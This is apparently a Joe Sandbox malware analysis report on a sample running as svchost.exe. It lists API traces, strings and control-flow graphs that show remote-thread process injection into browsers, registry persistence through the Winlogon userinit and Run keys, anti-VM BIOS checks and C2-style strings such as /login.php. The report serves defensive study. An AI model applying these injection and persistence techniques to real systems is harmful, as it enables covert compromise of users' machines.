                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 02D4499A
                                                                                                                                                                                                                • VirtualAllocEx.KERNEL32(00000000,00000000,?,00003000,00000040), ref: 02D449D4
                                                                                                                                                                                                                • WriteProcessMemory.KERNEL32(00000000,00000000,?,?,?), ref: 02D449F5
                                                                                                                                                                                                                • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 02D44A21
                                                                                                                                                                                                                • memcpy.MSVCRT ref: 02D44A39
                                                                                                                                                                                                                • WriteProcessMemory.KERNEL32(00000000,?,00000000,00000000,00000004,?,?,00003000,00000004), ref: 02D44A54
                                                                                                                                                                                                                • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,00003000,00000004), ref: 02D44A62
                                                                                                                                                                                                                • FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 02D44A8A
                                                                                                                                                                                                                • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02D44A9C
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,?), ref: 02D44AB4
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02D44AC5
                                                                                                                                                                                                                • RtlCreateUserThread.NTDLL ref: 02D44AE6
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,?), ref: 02D44B02
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02D44B13
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Handle$CreateProcess$CloseInformationThreadVirtual$AddressAllocMemoryModuleProcSnapshotToolhelp32Write$CacheCurrentErrorFlushFreeInstructionLastOpenRemoteSleepSwitchUsermemcpymemset
                                                                                                                                                                                                                • String ID: IsWow64Process$kernel32.dll
                                                                                                                                                                                                                • API String ID: 2650560580-3024904723
                                                                                                                                                                                                                • Opcode ID: 9b4373b6ce5fd09f37f3e1d303ed7f1c1bbe4370224a2c8783d43f51bf31c697
                                                                                                                                                                                                                • Instruction ID: 7a68a73cc74ea4d740b3ab5ac5a2b033ab3018822c07c640422df3527ef6b043
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9b4373b6ce5fd09f37f3e1d303ed7f1c1bbe4370224a2c8783d43f51bf31c697
                                                                                                                                                                                                                • Instruction Fuzzy Hash: A5618D75A40304ABEB10CF64EC89FAA77A8EF45748F548419F905AB380DBB4DD90CBA4
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • IsNetworkAlive.SENSAPI(02D26BEE,00000000), ref: 02D34B03
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02D34B11
                                                                                                                                                                                                                • DnsFlushResolverCache.DNSAPI ref: 02D34B1B
                                                                                                                                                                                                                • memset.MSVCRT ref: 02D34B38
                                                                                                                                                                                                                • lstrcpynA.KERNEL32(00000000,http://,00000104,?,00000000,74DF0F10), ref: 02D34B57
                                                                                                                                                                                                                • StrNCatA.SHLWAPI(00000000,www.bing.com,00000104), ref: 02D34B70
                                                                                                                                                                                                                • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02D34B83
                                                                                                                                                                                                                • memset.MSVCRT ref: 02D34B9C
                                                                                                                                                                                                                • lstrcpynA.KERNEL32(00000000,http://,00000104,?,?,?,?,00000000,74DF0F10), ref: 02D34BB5
                                                                                                                                                                                                                • StrNCatA.SHLWAPI(00000000,www.microsoft.com,00000104), ref: 02D34BC8
                                                                                                                                                                                                                • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02D34BD5
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CheckConnectionInternetlstrcpynmemset$AdminAliveCacheFlushNetworkResolverUser
                                                                                                                                                                                                                • String ID: http://$www.bing.com$www.microsoft.com
                                                                                                                                                                                                                • API String ID: 1656757314-3977723178
                                                                                                                                                                                                                • Opcode ID: 5b05dc2a302ce5eb930863805c82116989acbbd5b63fe6c0f2c6db19e44ffb10
                                                                                                                                                                                                                • Instruction ID: 534ee07b9b007a12563bffcbfe2488b849bcfc34db0dc74bbf17b7360a7cf9a7
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5b05dc2a302ce5eb930863805c82116989acbbd5b63fe6c0f2c6db19e44ffb10
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3F212D75E4431867D720D6A4FC45FDA776CDB54710F400585F688E6280DAF09EC48BA1
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: callocfree$exit
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 337157181-0
                                                                                                                                                                                                                • Opcode ID: 799d6e4666470e8fe3b18974225c12ff28ef07c62a9c2aabdb1c5277d4080d0c
                                                                                                                                                                                                                • Instruction ID: 8ffaedf09d410e9be475f4c6d79f9de88be667524b10e2b184194bccc92afeb2
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 799d6e4666470e8fe3b18974225c12ff28ef07c62a9c2aabdb1c5277d4080d0c
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6FF1CF71A002299BDB20CF98D888BAEB7B5FF98318F544169FD05A7340D775ED49CBA0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02D37314
                                                                                                                                                                                                                • Process32First.KERNEL32(00000000,?), ref: 02D37339
                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32(?,00000000), ref: 02D3735D
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex,?,?,00000000), ref: 02D37377
                                                                                                                                                                                                                • EnterCriticalSection.KERNEL32(02D6FB80,?,00000000), ref: 02D3739B
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,00000010,?,00000000), ref: 02D373A1
                                                                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 02D373A8
                                                                                                                                                                                                                • LeaveCriticalSection.KERNEL32(02D6FB80,?,00000000), ref: 02D373D7
                                                                                                                                                                                                                  • Part of subcall function 02D44450: OpenProcess.KERNEL32(00000400,00000000,00000000,74DEF550,00000000,76EEC3F0), ref: 02D44465
                                                                                                                                                                                                                  • Part of subcall function 02D44450: OpenProcessToken.ADVAPI32(00000000,00000018,?,?,?,?,?,?,?,?,?,?,?,?,02D353C3), ref: 02D4447C
                                                                                                                                                                                                                  • Part of subcall function 02D44450: GetTokenInformation.KERNELBASE(?,00000007(TokenIntegrityLevel),?,00000010,?), ref: 02D4449A
                                                                                                                                                                                                                  • Part of subcall function 02D44450: CharUpperA.USER32(?,?,?,?,?,?,?,?,?,?,?,?,02D353C3), ref: 02D444B2
                                                                                                                                                                                                                  • Part of subcall function 02D44450: GetHandleInformation.KERNEL32(?,00000000), ref: 02D4450B
                                                                                                                                                                                                                  • Part of subcall function 02D44450: FindCloseChangeNotification.KERNEL32(?), ref: 02D4451C
                                                                                                                                                                                                                  • Part of subcall function 02D44450: GetHandleInformation.KERNEL32(00000000,?), ref: 02D4452E
                                                                                                                                                                                                                  • Part of subcall function 02D44450: CloseHandle.KERNEL32(00000000), ref: 02D4453F
                                                                                                                                                                                                                • Process32Next.KERNEL32(00000000,00000128), ref: 02D373EB
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,?,?,00000000), ref: 02D37405
                                                                                                                                                                                                                • FindCloseChangeNotification.KERNEL32(00000000,?,00000000), ref: 02D37416
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                • iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex, xrefs: 02D37372
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: HandleInformationProcess$Close$ChangeCriticalFindHeapNotificationOpenProcess32SectionToken$AllocateCharCreateCurrentEnterFirstLeaveNextSnapshotToolhelp32Upper
                                                                                                                                                                                                                • String ID: iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex
                                                                                                                                                                                                                • API String ID: 280466567-4199822264
                                                                                                                                                                                                                • Opcode ID: b5485b1a9216bcf0dcb5c706ae03bfd4289703671fcb2721780cd8e7a77f01fa
                                                                                                                                                                                                                • Instruction ID: e186e40e0a3d21f2159a37e38dd79773808009880b5cd7f13332a848c7c4a0e6
                                                                                                                                                                                                                • Opcode Fuzzy Hash: b5485b1a9216bcf0dcb5c706ae03bfd4289703671fcb2721780cd8e7a77f01fa
                                                                                                                                                                                                                • Instruction Fuzzy Hash: DA31CF71D41215AFEB209F65E84CBAEBBF8EF08714F544498E889D2340DB709E90CBA0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • RegOpenKeyExA.KERNEL32(80000002,HARDWARE\DESCRIPTION\System,00000000,00000101,y9@), ref: 0040389C
                                                                                                                                                                                                                • RegQueryValueExA.KERNEL32(80000002,SystemBiosVersion,00000000,00000007,?,00000400), ref: 004038C1
                                                                                                                                                                                                                • RegCloseKey.KERNEL32(y9@), ref: 004038CF
                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(y9@), ref: 004038DF
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2909940532.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2909940532.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Close$OpenQueryValue
                                                                                                                                                                                                                • String ID: E$HARDWARE\DESCRIPTION\System$M$Q$SystemBiosVersion$U$y9@
                                                                                                                                                                                                                • API String ID: 1607946009-2685269968
                                                                                                                                                                                                                • Opcode ID: d1a36d96073f5a746890f6a5e71d9fcf43d2de7dda4d0654719f46e6941f7b17
                                                                                                                                                                                                                • Instruction ID: a73e17f2ece4285d148bbbe7d21167b22b4148350c2fc20c0d473cf4689022c2
                                                                                                                                                                                                                • Opcode Fuzzy Hash: d1a36d96073f5a746890f6a5e71d9fcf43d2de7dda4d0654719f46e6941f7b17
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 951165F2E00208FAEB20DF90DC45BAA7BB89B45315F1081EAE708751C1D7B86A448F5D
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • VirtualAlloc.KERNEL32(00000000,?,00003000,00000040,00000000,61FF864A), ref: 024C1435
                                                                                                                                                                                                                • LoadLibraryExA.KERNEL32(?,00000000,00000000,00000000,0AFB4677), ref: 024C14F5
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,00000000,00000000,180E1688), ref: 024C154C
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2911583731.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_24c0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AddressAllocLibraryLoadProcVirtual
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 4074058790-0
                                                                                                                                                                                                                • Opcode ID: aa7ce5a238270ceac95f37866199dfe78f7af4c79aa13279955b4abe68ef9424
                                                                                                                                                                                                                • Instruction ID: a800f2c9ce06ee7861ecbb4b2169b928d30c925b24ea988e5a7c6f33630b0dc8
                                                                                                                                                                                                                • Opcode Fuzzy Hash: aa7ce5a238270ceac95f37866199dfe78f7af4c79aa13279955b4abe68ef9424
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 44812979D00259AFCB90DBAAC840BAEB7B5AF88354F25445EE80CB7705D734E901CF94

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 349 2d37820-2d37832 350 2d37835-2d3783a 349->350 350->350 351 2d3783c-2d37843 350->351 352 2d37a85-2d37a8d IsUserAnAdmin 351->352 353 2d37849-2d37856 PathFileExistsA 351->353 354 2d37aa6-2d37ab6 352->354 355 2d37a8f-2d37aa4 352->355 353->352 356 2d3785c-2d37879 GetProcessHeap HeapAlloc 353->356 357 2d37abb-2d37ac3 RegOpenKeyExA 354->357 355->357 356->352 358 2d3787f-2d378bd memset GetShortPathNameA RegOpenKeyExA 356->358 361 2d37ac5-2d37ad4 CreateEventA 357->361 362 2d37b1a-2d37b20 357->362 359 2d378c3-2d378e5 RegQueryValueExA 358->359 360 2d37a0b-2d37a28 RegOpenKeyExA 358->360 363 2d379fb-2d37a09 RegFlushKey 359->363 364 2d378eb-2d37901 GetProcessHeap HeapAlloc 359->364 366 2d37a63-2d37a77 GetProcessHeap HeapValidate 360->366 367 2d37a2a-2d37a2f 360->367 361->362 365 2d37ad6-2d37aef RegNotifyChangeKeyValue 361->365 370 2d37a5d RegCloseKey 363->370 364->363 368 2d37907-2d37939 memset RegQueryValueExA StrStrIA 364->368 369 2d37af0-2d37af7 WaitForSingleObject 365->369 366->352 372 2d37a79-2d37a7f GetProcessHeap HeapFree 366->372 371 2d37a30-2d37a35 367->371 373 2d379d9-2d379ed GetProcessHeap HeapValidate 368->373 374 2d3793f-2d37941 368->374 369->369 375 2d37af9-2d37aff 369->375 370->366 371->371 376 2d37a37-2d37a5c RegSetValueExA RegFlushKey 371->376 372->352 373->363 377 2d379ef-2d379f5 GetProcessHeap HeapFree 373->377 378 2d37944-2d37949 374->378 379 2d37b01-2d37b06 call 2d445e0 375->379 380 2d37b0b-2d37b18 RegNotifyChangeKeyValue 375->380 376->370 377->363 378->378 381 2d3794b-2d3794d 378->381 379->380 380->369 383 2d37971 381->383 384 2d3794f-2d37954 381->384 386 2d37973-2d37978 383->386 384->383 385 2d37956-2d37959 384->385 387 2d37960-2d37966 385->387 386->386 388 2d3797a-2d3797f 386->388 387->387 389 2d37968-2d3796e 387->389 390 2d37980-2d37986 388->390 389->383 390->390 391 2d37988-2d37999 390->391 392 2d379a0-2d379a6 391->392 392->392 393 2d379a8-2d379b4 392->393 394 2d379b7-2d379bc 393->394 394->394 395 2d379be-2d379d6 RegSetValueExA 394->395 395->373
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • PathFileExistsA.SHLWAPI(C:\Windows\apppatch\svchost.exe), ref: 02D3784E
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,00000110), ref: 02D37863
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 02D37870
                                                                                                                                                                                                                • memset.MSVCRT ref: 02D37887
                                                                                                                                                                                                                • GetShortPathNameA.KERNEL32(C:\Windows\apppatch\svchost.exe,00000000,00000104), ref: 02D3789A
                                                                                                                                                                                                                • RegOpenKeyExA.KERNEL32(80000002,software\microsoft\windows nt\currentversion\winlogon,00000000,00000103,?), ref: 02D378B5
                                                                                                                                                                                                                • RegQueryValueExA.KERNEL32(?,userinit,00000000,00000000,00000000,00000000), ref: 02D378D3
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,-00000010), ref: 02D378F4
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 02D378FB
                                                                                                                                                                                                                • memset.MSVCRT ref: 02D3790B
                                                                                                                                                                                                                • RegQueryValueExA.KERNEL32(?,userinit,00000000,00000000,00000000,00000000), ref: 02D37925
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(00000000,C:\Windows\apppatch\svchost.exe), ref: 02D37931
                                                                                                                                                                                                                • RegSetValueExA.KERNEL32(?,userinit,00000000,00000001,00000000,00000002), ref: 02D379D0
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D379E2
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 02D379E5
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D379F2
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 02D379F5
                                                                                                                                                                                                                • RegFlushKey.ADVAPI32(?), ref: 02D379FF
                                                                                                                                                                                                                • RegOpenKeyExA.ADVAPI32(80000001,software\microsoft\windows\currentversion\run,00000000,000F013F,?), ref: 02D37A20
                                                                                                                                                                                                                • RegSetValueExA.ADVAPI32(?,userinit,00000000,00000001,00000000,00000002), ref: 02D37A49
                                                                                                                                                                                                                • RegFlushKey.ADVAPI32(?), ref: 02D37A53
                                                                                                                                                                                                                • RegCloseKey.KERNEL32(?), ref: 02D37A5D
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D37A6C
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 02D37A6F
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D37A7C
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 02D37A7F
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02D37A85
                                                                                                                                                                                                                • RegOpenKeyExA.KERNEL32(80000001,software\microsoft\windows\currentversion\run,00000000,00000101,?), ref: 02D37ABB
                                                                                                                                                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 02D37ACA
                                                                                                                                                                                                                • RegNotifyChangeKeyValue.KERNEL32(?,00000000,0000000F,00000000,00000001), ref: 02D37AE7
                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02D37AF3
                                                                                                                                                                                                                • RegNotifyChangeKeyValue.ADVAPI32(?,00000000,0000000F,00000000,00000001), ref: 02D37B16
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$ProcessValue$Open$AllocChangeFlushFreeNotifyPathQueryValidatememset$AdminCloseCreateEventExistsFileNameObjectShortSingleUserWait
                                                                                                                                                                                                                • String ID: C:\Windows\apppatch\svchost.exe$software\microsoft\windows nt\currentversion\winlogon$software\microsoft\windows\currentversion\run$userinit
                                                                                                                                                                                                                • API String ID: 2447656991-2103896814
                                                                                                                                                                                                                • Opcode ID: 280ae55d33dd991ce1a4d83d697ceb5fc95aedbe85cf1aba4350f7c46aa97432
                                                                                                                                                                                                                • Instruction ID: 4696071ae73de276f437613ca632511ad541cd357507955c84f53b87d65649bf
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 280ae55d33dd991ce1a4d83d697ceb5fc95aedbe85cf1aba4350f7c46aa97432
                                                                                                                                                                                                                • Instruction Fuzzy Hash: C081B3B1A84706BBFB218B64EC8DFAAB769EB48B05F504504F945A7380D7B1DD44CBB0

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 396 2d263b0-2d2640e memset DnsFlushResolverCache gethostbyname 397 2d26414-2d26441 GetTempPathA GetTempFileNameA 396->397 398 2d26708-2d26717 PathFileExistsA 396->398 399 2d26444-2d26449 397->399 400 2d26735-2d2673e 398->400 401 2d26719-2d2672f SetFileAttributesA DeleteFileA 398->401 399->399 402 2d2644b-2d2645b call 2d21720 399->402 401->400 405 2d26462-2d26485 call 2d34680 402->405 406 2d2645d 402->406 409 2d26487-2d264a2 call 2d34680 405->409 410 2d264af-2d264c7 call 2d27220 405->410 406->405 413 2d264a7-2d264a9 409->413 410->398 415 2d264cd-2d264e2 calloc * 2 410->415 413->398 413->410 416 2d264e4-2d264e5 exit 415->416 417 2d264eb-2d264f5 calloc 415->417 416->417 418 2d264f7-2d264f8 exit 417->418 419 2d264fe-2d2651f calloc 417->419 418->419 420 2d26521-2d26522 exit 419->420 421 2d26528-2d26532 calloc 419->421 420->421 422 2d26534-2d26535 exit 421->422 423 2d2653b-2d2655c calloc 421->423 422->423 424 2d26566-2d26571 calloc 423->424 425 2d2655e-2d26560 exit 423->425 426 2d26573-2d26575 exit 424->426 427 2d2657b-2d265a1 calloc 424->427 425->424 426->427 428 2d265a3-2d265a5 exit 427->428 429 2d265ab-2d265ba calloc 427->429 428->429 430 2d265c4-2d26607 call 2d21ac0 * 3 call 2d21b30 429->430 431 2d265bc-2d265be exit 429->431 439 2d2660c-2d26615 430->439 431->430 440 2d26617-2d2661f 439->440 440->440 441 2d26621-2d2663a _strrev 440->441 442 2d26640-2d26645 441->442 442->442 443 2d26647-2d26656 442->443 444 2d26658-2d2665c 443->444 445 2d2666c-2d2666e 443->445 446 2d26670-2d26678 444->446 447 2d2665e-2d2666a 444->447 445->446 448 2d266b3 445->448 450 2d2667a-2d2667d 446->450 451 2d266ab-2d266b1 446->451 447->444 447->445 449 2d266b5-2d266fa call 2d21970 * 4 GetProcessHeap HeapValidate 448->449 449->398 465 2d266fc-2d26702 GetProcessHeap HeapFree 449->465 450->448 453 2d2667f-2d26689 450->453 451->449 453->451 455 2d2668b-2d2668e 453->455 455->448 457 2d26690-2d2669a 455->457 457->451 458 2d2669c-2d2669f 457->458 458->448 460 2d266a1-2d266a9 458->460 460->451 465->398
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                • 10001, xrefs: 02D265E9
                                                                                                                                                                                                                • 6908741AF4E26C68E1EE46F1041F009EECA931D2D53E11AD04CF03DEB7677754725005219D4B978D957ABA1678D353DE5AA0586B49E21F7EFFE2F73D7D2D8E26395286E1EA7A106CD617966D9FC5906C6E952289B4D671BA6ADE1B80ECF2468552F401D4D8134CAF4B56DC5F18B673710974A6F7A9AE9273979C092F52E8D7C9, xrefs: 02D265CC
                                                                                                                                                                                                                • Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0), xrefs: 02D2645D, 02D2646D, 02D26491
                                                                                                                                                                                                                • !verif, xrefs: 02D263DD
                                                                                                                                                                                                                • Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0), xrefs: 02D26454
                                                                                                                                                                                                                • /login.php, xrefs: 02D26475, 02D26499
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: callocexit$FileHeap$PathProcessTempfree$AttributesCacheDeleteExistsFlushFreeNameResolverValidate_strrevgethostbynamememset
                                                                                                                                                                                                                • String ID: !verif$/login.php$10001$6908741AF4E26C68E1EE46F1041F009EECA931D2D53E11AD04CF03DEB7677754725005219D4B978D957ABA1678D353DE5AA0586B49E21F7EFFE2F73D7D2D8E26395286E1EA7A106CD617966D9FC5906C6E952289B4D671BA6ADE1B80ECF2468552F401D4D8134CAF4B56DC5F18B673710974A6F7A9AE9273979C092F52E8D7C9$Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)$Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                • API String ID: 3012421807-801546749
                                                                                                                                                                                                                • Opcode ID: ee5fc41179d8c5922cdc2c2926c29d63758ca299c2d9a95ab514173256a9fbb9
                                                                                                                                                                                                                • Instruction ID: 57e8b1880e43c19d660faf9b25cf465d65230e83b6718ecdb6aaf64f34b25ef4
                                                                                                                                                                                                                • Opcode Fuzzy Hash: ee5fc41179d8c5922cdc2c2926c29d63758ca299c2d9a95ab514173256a9fbb9
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 60B1E570940325ABDB209F649C88BAA7BBCEF55705F044498E645AB380D7B5DE48CBF0

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
